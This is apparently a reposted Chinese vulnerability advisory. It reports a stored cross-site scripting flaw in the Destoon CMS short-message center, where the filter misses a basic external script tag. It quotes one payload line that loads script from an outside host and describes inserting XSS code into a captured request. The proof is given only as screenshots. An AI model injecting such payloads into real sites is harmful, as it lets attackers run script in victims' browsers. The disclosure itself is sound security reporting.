destoon新版短消息中心xss指谁打谁(二)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: destoon新版短消息中心xss指谁打谁(二)。 ### 详细说明: 之前对带有"on"的都进行了过滤,增加了难度 首先选取一个对象我们去发消息 可是这次发现了基本的`<script src=http://www.wooyun.org></script>`都没过滤.. [<img src="https://images.seebug.org/upload/201404/021448182feba8e65e72a7c576c44eaffa60dfcb.jpg" alt="xss.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/021448182feba8e65e72a7c576c44eaffa60dfcb.jpg) 然后抓包,往里面填充我们的xss代码 [<img src="https://images.seebug.org/upload/201404/02144909e5a866e6d7c141b68831f1485ce2d801.jpg" alt="xss2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/02144909e5a866e6d7c141b68831f1485ce2d801.jpg) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201404/02145020cf3296e2cc6b561042ca11a29b1b2273.jpg" alt="xss3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201404/02145020cf3296e2cc6b561042ca11a29b1b2273.jpg) [<img...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息